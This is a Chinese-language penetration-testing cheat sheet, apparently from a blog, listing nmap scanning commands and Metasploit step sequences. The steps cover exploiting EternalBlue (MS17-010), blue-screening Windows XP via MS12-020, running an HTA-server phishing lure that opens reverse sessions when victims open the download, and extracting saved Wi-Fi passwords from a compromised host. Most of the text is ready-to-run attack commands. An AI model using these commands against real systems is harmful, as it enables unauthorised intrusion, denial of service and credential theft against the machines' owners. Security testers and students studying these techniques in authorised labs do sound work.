zoukankan      html  css  js  c++  java

  • 渗透测试

    信息搜集

    nmap --sP -iL abin.txt (从abin.txt导入ip地址列表进行扫描,-sP主机存货判断)
nmap -A 120.55.226.24 (启用操作系统检测,版本检测,脚本扫描和跟踪路由)
nmap -sS 120.55.226.24 (半连接扫描)
nmap -sT 120.55.226.24 (全连接扫描)
nmap -sU 120.55.226.24 (udp扫描)
nmap -D 1.1.1.1 192.168.1.102 (伪装地址为1.1.1.1)
nmap --mtu 8 192.168.1.102 (指定每个扫描包的大小)

nmap ip -v 10.1.2.1/24 (扫描代表的是10.1.2.1 ~ 10.1.2.255 进行扫描)
还有很多的工具,最常用的就是nmap,还有一个是xerosploit
xerosploit安装:
$ git clone https://github.com/LionSec/xerosploit.git
接下来,用sudo命令运行安装脚本install.py:
$ sudo python install.py

    漏洞利用工具msf

    msf打开方式

    直接在终端输入msfconsole
进入msf的目录/usr/share/metasploit-framework,运行命令./msfconsole

    更新

    kali 运行命令apt update,apt install metasploit-framework

    ------------------------------------------------------------------------------------------

    1 How to exploit Windows Vista only by victim's using Kali Linux (永恒之蓝漏洞)

    (smb_ms17_010)
    # msfconsole
    #msf> use auxiliary/scanner/smb/smb_ms17_010 (利用该模块查看对方主机是否存在该漏洞)
    #msf> set RHOSTS (remote ip) (设置对方ip)
    #msf> run (开始扫描)
    #msf> use exploit/windows/smb/ms17_010_psexec (若扫描成功存在该漏洞,就开始利用这个利用模块)
    #msf> set RHOSTS (remote ip) (设置对方ip)
    #msf> exploit (开始渗透)

    ------------------------------------------------------------------------------------------

    2. How to crash windows xp(blue screen) with metasploit using kali linux (如何让winxp蓝屏)

    # msfconsole
#msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids (漏洞利用)
#msf> set rhost (remote ip)
#msf> exploit

    ------------------------------------------------------------------------------------------

    3. How to exploit windows with HTA server using kali linux (搞一个钓鱼网战,当用户点击下载的打开就中招)

    #msfconsole
#msf> use windows/misc/hta_server/ (利用该模块)
#msf> set srvhost (local ip) (设置服务器ip,通常是自己的ip)
#msf> set uripath / (设置服务器路径)
#msf> exploit (开始监听渗透)
打开网页下载打开后.
#msf> sessions (若别人下载打开之后,会出现payload反弹,使用该名令来查看靶机)
#msf> sessions -i num (切换到渗透的靶机)

    ------------------------------------------------------------------------------------------

    5 How to get Windows Wi-Fi saved passwords using Metasploit and Kali Linux (如何获取对方的wifi密码)

    前提: 获取windows shell
#msf> shell
cmd> netsh wlan show profile (查看已缓存的wifi)
cmd> netsh wlan show profile [wifi_name] key=clear (查看选定的wifi名密码)

    ------------------------------------------------------------------------------------------
  • 相关阅读:
    [C++]C++指针和引用及区别
    FMX画图实例
    VCL画图实例
    DelphiXE FireMonkey 如何画图
    教程-Delphi 启动流程
    Delphi类引用示例
    手机UC下载视频M3U8转MP4
    ComputeShader中Counter类型的使用
    ComputeShader中Consume与AppendStructuredBuffer的使用
    通过一个小Trick实现shader的像素识别/统计操作
  • 原文地址:https://www.cnblogs.com/lyxf/p/12093435.html
Copyright © 2011-2022 走看看